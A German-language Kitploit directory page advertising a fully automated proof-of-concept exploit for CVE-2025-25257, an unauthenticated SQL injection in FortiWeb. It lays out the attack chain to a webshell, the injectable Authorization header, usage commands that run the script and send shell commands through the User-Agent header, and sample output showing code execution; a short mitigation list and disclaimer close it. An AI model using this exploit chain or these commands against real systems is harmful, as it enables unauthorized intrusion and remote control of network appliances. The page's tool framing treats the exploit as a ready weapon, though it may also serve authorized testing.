Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-25257 — PoC für CVE-2025-25257, eine kritische nicht authentifizierte SQL-Injection in FortiWeb. Nutzt SQLi über den Authorization-Header aus, um eine Webshell zu schreiben und RCE zu erlangen. Kein Login erforderlich. Vollständig automatisiert. | Kitploit
Tools/GitHubGitHub/0xgh057r3c0n/cve-2025-25257
Payload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsRed Teaming
GitHub0xgh057r3c0n/cve-2025-25257

CVE-2025-25257

PoC für CVE-2025-25257, eine kritische nicht authentifizierte SQL-Injection in FortiWeb. Nutzt SQLi über den Authorization-Header aus, um eine Webshell zu schreiben und RCE zu erlangen. Kein Login erforderlich. Vollständig automatisiert.

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Repository anzeigen
1vor 1 JahrNoch nicht geprüft

🚨 CVE-2025-25257 – FortiWeb SQLi to RCE

Kritische SQL-Injection → Webshell-Ausführung

Entdeckt und bewaffnet von 0xgh057r3c0n


🧠 Schwachstellenübersicht

CVE-2025-25257 betrifft FortiWeb-Systeme, die den Endpunkt /api/fabric/device/status bereitstellen, bei dem die Eingabe des Authorization-Headers nicht ordnungsgemäß bereinigt wird.

Ein Angreifer kann eine nicht authentifizierte SQL-Injection durchführen, um eine Webshell auf den Server zu schreiben und Befehle remote auszuführen.


💥 Angriffsablauf

root@kitploit:~
SQL Injection ➜ SQL INTO OUTFILE ➜ Python chmod Gadget ➜ Trigger ➜ Webshell RCE

📍 Angreifbarer Endpunkt

root@kitploit:~
GET /api/fabric/device/status
Header: Authorization: Bearer ';<SQLi>

🔓 Exploit-Funktionen

  • SQLi über Bearer-Token
  • SQL INTO OUTFILE zum Ablegen einer Shell
  • Python-Hook löst chmod aus
  • Befehle werden über User-Agent ausgeführt
  • Vollautomatischer PoC

🧪 Verwendung

root@kitploit:~
python3 CVE-2025-25257.py -t https://target-host.com

Anschließend:

root@kitploit:~
curl -k -H "User-Agent: whoami" https://target-host.com/cgi-bin/x.cgi

🔧 Anforderungen

  • Python 3.6+
  • requests-Modul

Installation:

root@kitploit:~
pip install requests

📤 Beispielausgabe

root@kitploit:~
[*] Writing Webshell Chunk: #!/bin/sh ...
[>] Exporting Webshell to File...
[*] Writing Chmod Gadget Chunk: import os ...
[>] Triggering chmod via Python Hook...
[*] Executing `id` via Webshell...
uid=33(www-data) gid=33(www-data)

[+] Webshell Ready:
    > https://target-host.com/cgi-bin/x.cgi
    > Send commands via User-Agent header

📊 CVSS-Bewertung

MetrikWert
Basiswert9.8 (KRITISCH)
AngriffsvektorNetzwerk
Erforderliche BerechtigungenKeine
Benutzerinteraktion

🛡️ Abhilfe

  • Aktualisieren Sie die FortiWeb-Firmware (falls Patch verfügbar)
  • Bereinigen Sie alle Header-Eingaben
  • Schränken Sie Dateischreibpfade und CGI-Ausführung ein

👨‍💻 Autor

0xgh057r3c0n 🔗 github.com/0xgh057r3c0n


⚠️ Haftungsausschluss

Dieser Proof-of-Concept dient ausschließlich zu Bildungs- und autorisierten Testzwecken. Nutzung auf eigenes Risiko. Der Autor übernimmt keine Verantwortung für Missbrauch.


Tool herunterladen
Keine
AuswirkungHoch (C/I/A)